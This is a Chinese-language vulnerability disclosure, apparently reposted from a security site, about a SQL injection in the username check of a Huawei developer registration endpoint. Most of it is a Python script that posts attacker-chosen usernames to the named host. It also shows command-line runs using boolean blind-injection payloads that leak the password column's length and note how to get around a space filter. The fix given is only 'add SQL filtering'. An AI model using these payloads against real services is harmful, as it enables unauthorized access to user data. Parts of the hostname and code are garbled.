作者: Matrix 简要描述: 华为智慧云存在SQL注入,理论上可修改后台数据 详细说明: http://developer.huaweidevice测试数据/dev_creg.php
用户名验证POST数据不严格,提交地址 /dev_creg/preg.php?ckuser=1
参考如下测试脚本: import httplib, urllib
import sys
if len(sys.argv) < 2:
exit(0)
headers = {
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.8",
"Referer": " http://developer.huaweidevice测试数据/dev_creg.php ",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) HdhCmsTest2cto测试数据 Chrome/13.0.782.112 Safari/535.1",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
}
params=urllib.urlencode({
"username": sys.argv[1],
})
conn = httplib.HTTPConnection('developer.huaweidevice测试数据')
conn.request("POST", "/dev_creg/preg.php?ckuser=1", params, headers)
response = conn.getresponse()
data = response.read()
try:
print data.decode("utf-8")
except Exception:
print dat 漏洞 证明: test.py ".a'" 返回错误信息:<b>SQL</b>: select uid from [Table]members where username='.a'' <br />
D:\>test.py ".a'or'1'='1" {"code":0,"msg":"昵称不合法或者已存在"}
后台有简单过滤遇到空格会截断。
D:\>test.py ".a'or(length(password)=32)or'2'='1" {"code":0,"msg":"昵称不合法或者已存在"}
D:\>test.py ".a'or(length(password)=31)or'2'='1" {"code":1,"msg":"恭喜该名字可以注册!"}
D:\>test.py ".a'or(length(password)=33)or'2'='1" {"code":1,"msg":"恭喜该名字可以注册!"} 修复方案: 建议做SQL过滤
查看更多关于华为智慧云存在SQL注入及修补方案 - 网站安全的详细内容...